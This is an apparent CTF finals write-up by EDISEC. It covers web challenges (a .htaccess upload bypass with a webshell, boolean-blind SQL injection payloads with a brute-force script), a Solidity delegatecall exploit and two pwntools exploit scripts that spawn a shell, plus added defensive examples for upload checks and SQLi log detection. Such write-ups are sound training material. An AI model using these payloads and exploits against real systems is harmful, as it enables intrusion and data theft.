2022 第五空间 (5space) CTF Finals Write-up by EDISEC

Posted by admin, 2022-09-27 15:53:08



01 Web

1. codereview

This challenge comes with an attachment; its upload directory already contains a prepared phar.jpg, so just locate the deserialization point and use it.

Testing the Yii application shows that the Gii module is present; select it.

Analysis of the password used by the one-line webshell:

2. esayupload

There is a hint in the front-end code.

Double-write bypass.

Visit that path and use the file upload: first upload a .htaccess containing

AddType application/x-httpd-php .jpg

then upload the .jpg webshell. Checking the file contents reveals:


disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld

Use the AntSword (蚁剑) plugin.
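From the defender's side, an added example (not code from the write-up or the challenge) showing why the single-pass blacklist that the double-write bypass defeats is weak, beside a whitelist check that also refuses .htaccess and verifies image magic bytes. The policy, names and sample bytes are constructed for this illustration.

```python
import os
import re

# Assumed policy for the page's upload scenario (constructed, not the challenge code):
# only image extensions are accepted, and Apache override files are rejected outright,
# because the bypass on this page relies on uploading a .htaccess that maps .jpg to PHP.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
APACHE_OVERRIDE_FILES = {".htaccess", ".htpasswd", ".user.ini"}
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png", b"GIF8": "gif"}


def naive_filter(filename):
    """The weak check: one non-recursive pass that deletes 'php' from the name.
    A single pass over 'pphphp' leaves 'php' behind, which is the double-write bypass."""
    return re.sub(r"php", "", filename, flags=re.IGNORECASE)


def hardened_name_check(filename):
    """Whitelist instead of blacklist: exactly one extension, from ALLOWED_EXT,
    a plain stem, and no dotfiles (so .htaccess can never be stored)."""
    base = os.path.basename(filename)
    if base.startswith(".") or base.lower() in APACHE_OVERRIDE_FILES:
        return False
    if base.count(".") != 1:  # rejects shell.php.jpg style double extensions
        return False
    stem, ext = base.rsplit(".", 1)
    if ext.lower() not in ALLOWED_EXT:
        return False
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem) is not None


def content_matches_extension(data, filename):
    """Signature check: the bytes must start with the magic of the claimed image type.
    This alone does not stop execution once .htaccess remaps .jpg to PHP; the name
    check above (plus AllowOverride None on the server) is what prevents that."""
    ext = filename.rsplit(".", 1)[-1].lower()
    ext = "jpg" if ext == "jpeg" else ext
    return any(data.startswith(magic) and kind == ext for magic, kind in MAGIC.items())


def accept_upload(filename, data):
    """Combined decision: both the name policy and the content signature must pass."""
    return hardened_name_check(filename) and content_matches_extension(data, filename)
```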

3. easysqli

Boolean-based blind injection. information_schema is filtered, so sys.schema_table_statistics_with_buffer is used as a replacement.

Payload:

2'%26%26(ord(substr((select(group_concat(table_name))from(sys.schema_table_statistics_with_buffer)where(table_schema)like'web2') %26%26'1

Column-less injection on the flag table.

Script:

import requests
import datetime

proxies = {"http": "127.0.0.1:8080", "https": None}

if __name__ == '__main__':
    # change the target url here
    url = "http://39.107.82.142:34754/index.php?id="
    str1 = '!#()-.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz{}'
    tmp = ""
    while True:
        for i in range(0, len(str1)):
            # tuple comparison: becomes true one character past the correct one,
            # hence str1[i-1] is taken below
            sql = "2'%26%26((select*from(users)limit/**/1)<(select/**/'administrator',binary'{}'))%26%26'1".format(tmp + str1[i])
            sql_url = url + sql
            r = requests.get(sql_url, proxies=proxies)
            if 'alice' in r.text:
                tmp = tmp + str1[i - 1]
                print(tmp)
                break

Then inject the users table: guess the column names and run it directly.

Log in with the User-Agent and Accept headers replaced, and the flag appears.
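As an added example from the detection side (not part of the original write-up): a small access-log scanner that URL-decodes the query string, turns the /**/ comment trick back into whitespace, and flags the indicators these two payloads rely on. The log lines and the indicator names are constructed for this illustration.

```python
import re
from urllib.parse import unquote

# Indicators lifted from the payloads in this write-up: the sys.* substitute for
# information_schema, the ord(substr()) boolean-blind probe, and the column-less
# tuple comparison "< (select 'x', binary '...')".
SQLI_PATTERNS = {
    "sys_schema_probe": r"sys\.schema_table_statistics_with_buffer",
    "info_schema": r"information_schema",
    "bool_blind_probe": r"ord\(substr\(",
    "tuple_compare": r"<\s*\(select\s*['\"]",
    "binary_prefix": r"binary\s*['\"]",
    "quoted_and": r"'\s*&&\s*\(",
}

# Constructed access-log lines (Apache combined format, client IP from the
# documentation range); the two payloads are the ones shown on this page.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Sep/2022:10:00:00 +0800] "GET /index.php?id=2 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Sep/2022:10:00:01 +0800] "GET /index.php?id=2\'%26%26(ord(substr((select(group_concat(table_name))from(sys.schema_table_statistics_with_buffer)where(table_schema)like\'web2\')%20%26%26\'1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Sep/2022:10:00:02 +0800] "GET /index.php?id=2\'%26%26((select*from(users)limit/**/1)<(select/**/\'administrator\',binary\'a\'))%26%26\'1 HTTP/1.1" 200 512',
]


def normalize(query):
    """Decode twice (%26%26 -> &&, and catches double encoding), replace /**/
    comments with spaces, collapse whitespace and lowercase."""
    s = unquote(unquote(query))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).lower()


def scan_request_line(line):
    """Return the names of the indicators matched by one log line's query string."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    if not m or "?" not in m.group(1):
        return []
    q = normalize(m.group(1).split("?", 1)[1])
    return [name for name, pat in SQLI_PATTERNS.items() if re.search(pat, q)]


def flag_log(lines):
    """Map line index -> matched indicators, only for lines that matched something."""
    result = {}
    for i, line in enumerate(lines):
        hits = scan_request_line(line)
        if hits:
            result[i] = hits
    return result
```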

02 Misc

1. Can_you_be_rich

Connecting with nc shows the challenge's contract source:

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.0;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/access/Ownable.sol";

contract CTFToken is ERC20, Ownable {
    bool airdropped;

    constructor() ERC20("CTFToken", "CTF") {
        _mint(address(msg.sender), 100000000000);
    }

    function airdrop(uint num) public onlyOwner {
        require(!airdropped, "Already airdropped");
        airdropped = true;
        _mint(msg.sender, num);
    }
}

contract Vuln {
    CTFToken public token;
    bool solved;

    constructor() public {
        token = new CTFToken();
    }

    function set(address _contract) public {
        (bool success, bytes memory data) = _contract.delegatecall(
            abi.encodeWithSignature("set()")
        );
        require(success, "delegatecall failed");
        require(!solved, "");
    }

    function solve() public {
        require(token.balanceOf(msg.sender) >= 100000000000);
        solved = true;
    }

    function isSolved() public view returns (bool) {
        return solved;
    }
}

The .delegatecall() inside Vuln's set() can be used to call an attack contract and make the balance larger than 100000000000.

An RPC endpoint and a faucet are provided; connect MetaMask to the RPC.

The faucet sends funds to the current address; request a bit extra.

Terminal interaction:

deployer account: 0xccBB26F75bb7F634c595c8A5C1A351f6be837f9D

Send funds to this account.

This yields the contract address of the deployed contract.

First deploy token1 and note its contract address.

Change the token address in attck to token1's contract address, then deploy attck.

contract token1 {
    function balanceOf(address _address) public view returns (uint256) {
        return 900000000009;
    }
}

contract attck {
    address public token;

    function set() public {
        token = 0x792d61a0A3AfE70aE16A72FA98c94213C13f647f;
    }
}

Then call attck through Vuln's set().

At this point the flag can be obtained.

05 Pwn

1. takeeasy

#coding:utf-8
from pwn import *

context.log_level = 'debug'
elfelf = './pwn'
elf = ELF(elfelf)
context.arch = elf.arch
gdb_text = '''
'''

if len(sys.argv) == 1:
    io = process(elfelf)
    gdb_open = 1
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
    # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
    one_gadgaet = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
elif sys.argv[1] == '2':
    io = process(elfelf)
    gdb_open = 0
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
    # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
    one_gadgaet = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
else:
    io = remote('39.107.68.43', 42324)
    gdb_open = 0
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
    # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
    one_gadgaet = [0x45226, 0x4527a, 0xf03a4, 0xf1247]


def gdb_attach(io, a):
    if gdb_open == 1:
        gdb.attach(io, a)


# io.recv()
pay = 'a' * 0x18 + p64(0x4011FF) + p64(0x401176)
io.sendline(pay)
# libc_base = u64(io.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.sym['__malloc_hook'] - 88 - 0x10
# libc.address = libc_base
# bin_sh_addr = libc.search('/bin/sh\x00').next()
# system_addr = libc.sym['system']
# free_hook_addr = libc.sym['__free_hook']
# success('libc_base:' + hex(libc_base))
# success('heap_base:' + hex(heap_base))
gdb_attach(io, gdb_text)
io.interactive()

2. easyfp

#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './pwn'
#context.arch='amd64'

while True:
    # try:
    elf = ELF(elfelf)
    context.arch = elf.arch
    gdb_text = '''
    b fputs
    '''
    if len(sys.argv) == 1:
        clibc = CDLL('/lib/x86_64-linux-gnu/libc-2.31.so')
        io = process(elfelf)
        gdb_open = 1
        # io=process(['./'],env={'LD_PRELOAD':'./'})
        clibc.srand(clibc.time(0))
        libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
        one_gadgaet = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
    else:
        clibc = CDLL('/lib/x86_64-linux-gnu/libc-2.31.so')
        io = remote('39.106.154.197', 29493)
        gdb_open = 0
        clibc.srand(clibc.time(0))
        libc = ELF('./libc.so.6')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')
        one_gadgaet = [0x45226, 0x4527a, 0xf03a4, 0xf1247]

    def gdb_attach(io, a):
        if gdb_open == 1:
            gdb.attach(io, a)

    def choice(a):
        io.sendlineafter('>> ', str(a))

    def add(a):
        choice(1)
        io.sendafter('Name:\n', a)

    def edit(a):
        choice(3)
        io.sendafter('\n', a)

    def show(a):
        choice(4)
        io.sendafter('\n', a)

    def delete(a):
        choice(2)
        io.sendafter('Name:\n', a)

    for i in range(7):
        edit('k' * 0xe0)
        show('\n')
    add('aaa')
    edit('k' * 0xe0)
    show('\n')
    add('aaa')
    add('bbb')
    delete('aaa')
    edit('k' * 0xe0)
    add('a' * 0x68)
    stderr = 0xc0
    for i in range(0x10):
        delete('a' * 0x68 + '\xc0' + p8(0x5 + i * 0x10))
        kk = io.recvuntil('add')
        if 'Not found' in kk:
            continue
        else:
            stderr += ((0x5 + i * 0x10) << 8)
            break
    add('a' * 0x68)
    for i in range(0x100):
        delete('a' * 0x68 + p16(stderr) + p8(i))
        kk = io.recvuntil('add')
        if 'Not found' in kk:
            continue
        else:
            stderr += (i << 0x10)
            break
    add('a' * 0x68)
    for i in range(0x100):
        delete('a' * 0x68 + p64(stderr)[:3] + p8(i))
        kk = io.recvuntil('add')
        if 'Not found' in kk:
            continue
        else:
            stderr += (i << 0x18)
            break
    add('a' * 0x68)
    for i in range(0x100):
        delete('a' * 0x68 + p64(stderr)[:4] + p8(i))
        kk = io.recvuntil('add')
        if 'Not found' in kk:
            continue
        else:
            stderr += (i << 0x20)
            break
    stderr += (0x7f << 0x28)
    libc_base = stderr - libc.sym['_IO_2_1_stderr_']
    libc.address = libc_base
    bin_sh_addr = libc.search('/bin/sh\x00').next()
    system_addr = libc.sym['system']
    free_hook_addr = libc.sym['__free_hook']
    add('\x00' * 0x68)
    show('\n')
    edit('k' * 0xe0)
    show('\n')
    edit('k' * 0xe0)
    show('\n')
    add(p64(free_hook_addr))
    add('/bin/sh\x00')
    add(p64(system_addr))
    delete('/bin/sh\x00')
    # success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    gdb_attach(io, gdb_text)
    io.interactive()
    # except Exception as e:
    #     io.close()
    #     continue
    # else:
    #     continue

Originally published on the WeChat public account EDI安全 (EDI Security): 2022第五空间CTF决赛WriteUp By EDISEC

Posted by admin on 2022-09-27 15:53:08. Source: http://cn-sec.com/archives/1318813.html